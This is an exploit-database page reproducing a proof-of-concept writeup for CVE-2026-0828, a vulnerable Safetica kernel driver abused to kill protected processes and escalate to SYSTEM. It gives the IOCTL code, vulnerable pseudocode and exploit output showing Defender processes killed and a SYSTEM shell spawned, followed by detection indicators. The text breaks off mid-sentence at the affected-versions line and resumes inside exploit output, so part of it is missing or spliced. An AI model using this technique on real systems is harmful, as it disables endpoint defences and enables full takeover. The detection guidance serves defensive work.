Share
## https://sploitus.com/exploit?id=E3113D7A-18FE-59ED-8FB1-D4B7442516BB
# CVE-2026-0828 โ€” Safetica ProcessMonitorDriver.sys BYOVD PoC

Safetica DLP kernel driver (`ProcessMonitorDriver.sys`) exposes an unauthenticated IOCTL that allows any user-mode caller to terminate arbitrary processes via `ZwTerminateProcess` in kernel context, bypassing PPL (Protected Process Light) protection.

**CVSS:** 8.8 (High) ยท **Type:** BYOVD, LPE ยท **Platform:** Windows x64

---

## Vulnerability

The `IRP_MJ_DEVICE_CONTROL` handler for IOCTL `0xB822200C` calls `ZwOpenProcess` with `PROCESS_ALL_ACCESS (0x1FFFFF)` and subsequently `ZwTerminateProcess` using a PID supplied directly from the input buffer โ€” **without any privilege or caller validation.**

```c
// Vulnerable handler (IDA pseudocode)
ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer);

ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0);  // no SeSinglePrivilegeCheck, no ExGetPreviousMode check
```

Because the call originates in kernel context, PPL-protected processes (Windows Defender, EDR agents) can be terminated.

**Affected versions:** Safetica  KILLED
  NisSrv.exe        PID 4180  -> KILLED

SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned
```

A new `cmd.exe` window opens as `NT AUTHORITY\SYSTEM`.

---

## Detection

**Event ID 7045** โ€” new kernel service installation:
```
Service Name:      STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type:      kernel mode driver
```

**WDAC blocklist (SHA256):**
```
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b
```

**ETW:** Monitor `DeviceIoControl` calls to `\\.\STProcessMonitorDriver`.

---

## Tested On

- Windows 10 22H2 x64

---

> **For authorized security research and lab use only. Do not use against systems you do not own or have written permission to test.**